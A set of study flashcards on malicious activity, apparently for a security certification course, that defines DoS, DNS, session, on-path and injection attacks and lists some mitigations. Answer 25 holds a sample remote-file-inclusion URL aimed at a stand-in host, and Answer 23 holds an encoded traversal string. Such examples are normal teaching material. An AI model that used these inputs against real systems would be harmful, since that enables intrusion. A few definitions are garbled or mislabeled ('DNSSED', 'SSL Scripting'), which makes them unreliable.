Malicious Activity

Question 1

DoS (Denial of Service) Definition

Answer 1

Used to describe an attack that attempts to make a computer or server’s resources unavailable

Question 2

DDoS (Distributed Denial of Service) Variants

Answer 2

DoS, Amplified DDoS, Reflected DDoS

Question 3

DNS Attack Types

Answer 3

• DNS Cache Poisoning
• DNS Amplification
• DNS Tunneling
• Domain Hijacking
• DNS Zone Transfer

Question 4

Directory Traversal Attacks

Answer 4

Exploiting insufficient security validation of user-supplied input file names

Question 5

Privilege Escalation Attack

Answer 5

Exploiting system vulnerability to gain elevated access

Question 6

Replay Attacks

Answer 6

Type of network-based attack where valid data transmissions are maliciously or fraudulently re-broadcast, repeated, or delayed
Involves intercepting data, analyzing it, and deciding whether to retransmit it later
Application - Email \ Online shopping \ social media

Question 7

Session Hijacking

Answer 7

Attacker takes over a user session to gain unauthorized access

Question 8

Replay Vs Session Hijacking

Answer 8

• In a Session Hijack, the attacker alters real-time data transmission
• In a Replay Attack, the attacker intercepts the data and then can decide later whether to retransmit the data

Question 9

Malicious Code Injection Attacks

Answer 9

Introduction of harmful code into a program or system

Question 10

Indicators of Compromise (IoC)
(Examples listed)

Answer 10

Account lockout
Concurrent session usage
Blocked content
Impossible travel
Resource consumption
Inaccessibility
Out-of-cycle logging
Published documents indicating hacking
Missing logs

Question 11

Ping Flood (Flood Attacks type)

Answer 11

Overloading a server with ICMP echo requests (pings)
Mitigation - often countered by blocking echo replies

Question 12

SYN Flood (Flood Attacks type)

Answer 12

Initiating multiple TCP sessions but not completing the 3-way handshake and consumes server resources and prevents legitimate connections
Mitigation \ Countermeasures
- Flood guard \ Timeout configurations \ Intrusion Prevention systems.

Question 13

Permanent Denial of Service (PDOS) Attack

Answer 13

Exploits security flaws to break a networking device permanently by re-flashing its firmware
Requires a full firmware reload to bring the device back online

Question 14

Fork Bomb

Answer 14

Attack creates a large number of processes, consuming processing power
Not considered a worm, as it doesn’t infect programs or use the network
Self-replicating nature causes a denial of service condition

Question 15

DNS Amplification

Answer 15

Specialized DDoS that allows an attacker to initiate DNS requests from a spoof IP address to flood a website

Question 16

Surviving and Preventing DoS \ DDoS Attacks (page 270)

Answer 16

• Black Hole or Sinkhole
• IPS
• Elastic Cloud Infrastructure
• Specialized Cloud Service Providers

Question 17

Black Hole or Sinkhole (Surviving and Preventing DoS\DDoS)

Answer 17

Routes attacking IP traffic to a non-existent server through a null interface and it is effective but temporary solution

Question 18

DNS Cache Poisoning (DNS Spoofing)

Answer 18

Corrupts a DNS resolver’s cache with false information and redirects users to malicious websites
Mitigation - Use DNSSED (Domain Name System Security Extensions) to add digital signatures to DNS data
Mitigation - Implement secure network configurations and firewalls to protect DNS servers

Question 19

DNS Amplification Attacks

Answer 19

Overwhelms a target system with DNS response traffic by exploiting the DNS resolution process
Spoofed DNS queries sent to open DNS servers
Mitigation - Limit the size of DNS responses \ Rate limit DNS response traffic to reduce the impact

Question 20

DNS Tunneling

Answer 20

Encapsulates non-DNS traffic (e.g., HTTP, SSH) over port 53
Attempts to bypass firewall rules for command and control or data exfiltration
Mitigation - Monitor and analyze DNS logs for unusual patterns indicating tunneling

Question 21

Domain Hijacking (Domain Theft)

Answer 21

Unauthorized change of domain registration
May lead to loss of website control and redirection to malicious sites

Question 22

DNS Zone Transfer Attacks

Answer 22

Attempts to obtain an entire DNS zone data copy
Exposes sensitive information about a domain’s network infrastructure
Could be used for reconnaissance in future attacks

Question 23

Directory Traversal Attack

Answer 23

• An injection attack occurs when the attacker inserts malicious code through an application interface
• Application attack that allows access to commands, files, and directories that may or may not be connected to the web document root directory
• Attackers may use encoding to hide directory traversal attempts (%2e%2e%2f represents . . / )

Question 24

File Inclusion

Answer 24

Web application vulnerability that allows an attacker either to download a file from an arbitrary location on the host file system or to upload an executable or script file to open a backdoor

Question 25

Remote File Inclusion

Answer 25

An attacker executes a script to inject a remote file into the web app or website https://diontraining.com/login.php? user=http://malware.bad/malicious.php

Question 26

Arbitrary Code Execution

Answer 26

Vulnerability allows an attacker to run their code without restrictions

Question 27

Remote Code Execution

Answer 27

Type of arbitrary code execution that occurs remotely, often over the internet

Question 28

Rootkits

Answer 28

Class of malware that conceals its presence by modifying system files, often at the kernel level Ring Zero - Kernel with highest privileges Rings 1 to 3 - User-level components with decreasing privileges

Question 29

Session Management

Answer 29

- Fundamental security component in web applications - Enables web applications to uniquely identify a user across a number of different actions and requests, while keeping the state of the data generated by the user and ensuring it is assigned to that userC

Question 30

Cookie

Answer 30

Text file used to store information about a user when they visit a website - Cookies must be protected because they contain client information that is being transmitted across the Internet

Question 31

Session Vs Persistent Cookies

Answer 31

Session - Non-persistent, reside in memory, and are deleted when the browser instance is closed Persistent - Cookies that are stored in the browser cache until they are deleted by the user or pass a defined expiration date

Question 32

Session Hijacking

Answer 32

- A type of spoofing attack where the attacker disconnects a host then replaces it with his or her own machine, spoofing the original host's IP address - Session hijacking attacks can occur through the theft or modification of cookies

Question 33

Session Prediction Attacks

Answer 33

Modifies the contents of a cookie after it has been generated and sent by the web service to the client's browser so that the newly modified cookie can be used to exploit vulnerabilities in the web app

Question 34

On-Path Attack

Answer 34

An attack where the attacker positions their workstation logically between two hosts during communication - The attacker transparently captures, monitors, and relays communications between those hosts

Question 35

Methods of On-Path Attacks

Answer 35

ARP Poisoning DNS Poisoning Rogue Wireless Access Point Rogue Hub or Switch

Question 36

ARP Poisoning

Answer 36

Manipulating Address Resolution Protocol (ARP) tables to redirect network traffic

Question 37

DNS Poisoning

Answer 37

Altering DNS responses to reroute traffic

Question 38

Rogue Wireless Access Point

Answer 38

Creating a fake wireless access point to intercept traffic

Question 39

Rogue Hub or Switch

Answer 39

Introducing a malicious hub or switch to capture data on a wired network

Question 40

Relay Attack

Answer 40

The attacker becomes part of the conversation between two hosts - Serves as a proxy and can read or modify communications between the hosts - Any traffic between the client and server goes through the attacker

Question 41

SSL Scripting

Answer 41

An attack that tricks the encryption application into presenting an HTTP connection instead of HTTPS - Enables attackers to capture unencrypted data when the user believes they are using a secure connection

Question 42

Downgrade Attack

Answer 42

An attacker forces a client or server to abandon a higher security mode in favor of a lower security mode

Question 43

Lightweight Directory Access Protocol (LDAP)

Answer 43

An open, vendor-neutral, industry standard application protocol for accessing and maintaining distributed directory information services over an Internet Protocol network

Question 44

Injection Attacks

Answer 44

LDAP Injection Command Injection Process Injection

Question 45

LDAP Injection

Answer 45

An application attack that targets web-based applications by fabricating LDAP statements that are typically created by user input - Use input validation and input sanitization as protection against an LDAP injection attack

Question 46

Command Injection

Answer 46

Occurs when a threat actor is able to execute arbitrary shell commands on a host via a vulnerable web application

Question 47

Process Injection

Answer 47

Method of executing arbitrary code in the address space of a separate live process

Question 48

Indicators of Compromise (IoC)

Answer 48

Pieces of forensic data that identify potentially malicious activity on a network or system - Serves as digital evidence that a security breach has occurred